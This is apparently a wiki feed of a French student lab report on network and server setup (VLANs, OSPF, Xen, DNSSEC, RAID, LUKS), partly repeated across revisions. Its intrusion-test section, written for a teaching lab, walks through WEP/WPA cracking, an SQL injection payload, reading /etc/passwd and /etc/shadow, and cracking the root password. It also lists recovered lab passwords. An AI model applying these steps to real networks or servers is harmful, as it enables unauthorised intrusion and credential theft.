&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
On ajoute à notre fichier named.conf.options les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
 dnssec-enable yes; //Activer le dnssec, même si déprécié sur notre version&lt;br /&gt;
 dnssec-validation yes; //FOrcer le dnssec&lt;br /&gt;
&lt;br /&gt;
On génère ensuite nos clés, dans un fichier connus&lt;br /&gt;
&lt;br /&gt;
 cd /etc/bind/master&lt;br /&gt;
 dnssec-keygen -a NSEC3RSASHA1 -b 2048 -n ZONE anosteke59.site &lt;br /&gt;
 //Kanosteke59.site.+007+15849&lt;br /&gt;
 dnssec-keygen -f KSK -a NSEC3RSASHA1 -b 4096 -n ZONE anosteke59.site&lt;br /&gt;
 //Kanosteke59.site.+007+60636&lt;br /&gt;
&lt;br /&gt;
ici on crée une clé pour du SHA-1&lt;br /&gt;
ON peut ensuite renommer les fichiers &lt;br /&gt;
 &lt;br /&gt;
 mv Kanosteke59.site.+007+60636.key  Kanosteke59.site.ksk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+60636.private  Kanosteke59.site.ksk.private&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.key  Kanosteke59.site.zsk.key&lt;br /&gt;
 mv Kanosteke59.site.+007+15849.private  Kanosteke59.site.zsk.private&lt;br /&gt;
&lt;br /&gt;
On ajoute dans la fin de définition du domaine :&lt;br /&gt;
&lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 &lt;br /&gt;
 ...&lt;br /&gt;
 &lt;br /&gt;
 $INCLUDE Kanosteke59.site.zsk.key&lt;br /&gt;
 $INCLUDE Kanosteke59.site.ksk.key&lt;br /&gt;
&lt;br /&gt;
On signe maintenant nos fichier de définition&lt;br /&gt;
 dnssec-signzone -o anosteke59.site  -k Kanosteke59.site.ksk anosteke59.site Kanosteke59.site.zsk&lt;br /&gt;
&lt;br /&gt;
On modifie ensuite notre fichier '/etc/bind/named.conf.options' pour pointer sur ce nouveau fichier signé&lt;br /&gt;
 zone &amp;quot;anosteke59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/master/anosteke59.site.signed&amp;quot;;&lt;br /&gt;
         notify yes;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
j'ai vérifié la config final avec : https://dnssec-analyzer.verisignlabs.com/anosteke59.site&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
et on valide les modifications:&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Pour démarrer, nous formatons la clé :&lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
A l'aide de ''cryptsetup'', nous initialisons la clé USB avec l'option luksFormat et choisissons un mot de passe :&lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous ouvrons ensuite notre partition chiffrée et créons le nom du volume : crypte &lt;br /&gt;
 cryptsetup luksOpen /dev/sdb crypte&lt;br /&gt;
Puis nous le formatons&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypte &lt;br /&gt;
&lt;br /&gt;
Nous montons ensuite la partition afin d'y ajouter un fichier test :&lt;br /&gt;
 mkdir /mnt/cryptUSB&lt;br /&gt;
 mount -t ext4 /dev/mapper/crypte /mnt/cryptUSB/&lt;br /&gt;
&lt;br /&gt;
Nous créons ce fichier test.txt en y inscrivant &amp;quot;BONJOUR MONDE !&amp;quot; :&lt;br /&gt;
 nano /mnt/cryptUSB/test.txt&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons et fermons le volume chiffré :&lt;br /&gt;
 umount /mnt/cryptUSB&lt;br /&gt;
 cryptsetup luksClose crypte&lt;br /&gt;
&lt;br /&gt;
Afin de vérifier le cryptage de la clé, nous le mettons sur un autre PC. On se rend compte que le mot de passe est obligatoire pour accéder aux fichiers&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== WEP ===&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
Notre clé est : 55:55:55:55:5A:BC:08:CB:A4:44:44:44:44&lt;br /&gt;
&lt;br /&gt;
=== WPA ===&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
=== Intrusion serveur WEB ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous réalisons une injection sql afin de récupérer la liste de tous les utilisateurs du site honey.plil.info. Nous choisissons comme utilisateur &amp;quot;' or 1=1; --&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous nous connectons avec le compte administrateur. Dans un des fichiers, nous trouvons des allusions à PHPMyAdmin.&lt;br /&gt;
De là, 3 menus, dont 2 sont intéressants. Dans l'onglet ''gestion des manuels'', on peut ajouter un fichier depuis le serveur.&amp;lt;br/&amp;gt;&lt;br /&gt;
Ainsi, nous avons ajouté le fichier /etc/phpmyadmin/config-db.php.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Depuis la page ''Recherche d'un manuel'', nous avons pû télécharger ce fichier, qui nous a indiqué le mot de passe du compte phpmyadmin : '''gencovid19'''.&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
2. PHPMyAdmin&lt;br /&gt;
&lt;br /&gt;
Nous avons donc ouvert l'URL http://honey.plil.info/phpmyadmin dans un navigateur, et nous nous connectons avec le compte root:gencovid19&lt;br /&gt;
Dans PHPMyAdmin, nous trouvons un DB test avec des identifiants : rex:plainpassword &lt;br /&gt;
&lt;br /&gt;
3. Récupération de fichiers avec l'user rex&lt;br /&gt;
&lt;br /&gt;
Nous avons donc réussi à nous connecter en SSH au serveur, et nous avons récupéré les fichiers /etc/passwd et /etc/shadow.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons lancé la commande :&lt;br /&gt;
 unshadow /etc/passwd /etc/shadow | head -1 &amp;gt; mdp&lt;br /&gt;
Nous avons obtenu un fichier avec le mot de passe root haché.&lt;br /&gt;
&lt;br /&gt;
5. Decryptage du mot de passe root avec John the Ripper&lt;br /&gt;
&lt;br /&gt;
Pour casser le mot de passe, nous avons utilisé John the Ripper. Nous nous sommes aidé des indications : &amp;quot;mot de passe présentant les mêmes caractéristiques que le mot de passe root habituel&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Nous avons créé un dictionnaire de mots de 4 lettres : &lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dict&lt;br /&gt;
&lt;br /&gt;
Pour obtenir des mots de 8 lettres (en duplicant les mots de 4 lettres), nous avons utilisé sed : &lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/'&lt;br /&gt;
La dernière étape consistait à lancer JtR :&lt;br /&gt;
 john -w:dict mdp&lt;br /&gt;
Après 5 minutes d'attente, le mot de passe vu cracké.&amp;lt;br/&amp;gt;&lt;br /&gt;
Avec la commande : &lt;br /&gt;
 john --show mdp&lt;br /&gt;
On obtient le mot de passe : '''fortfort'''.&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57771</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57771"/>
				<updated>2022-01-10T17:27:33Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* WPA */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @       IN      SOA     (&lt;br /&gt;
                        ns.anosteke.site.&lt;br /&gt;
                        ns6.gandi.net.&lt;br /&gt;
                        2;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        3600;&lt;br /&gt;
                        )&lt;br /&gt;
&lt;br /&gt;
         IN      NS      ns6.gandi.net. &lt;br /&gt;
 www     IN      A       193.48.57.182&lt;br /&gt;
 ns      IN      CNAME   www&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
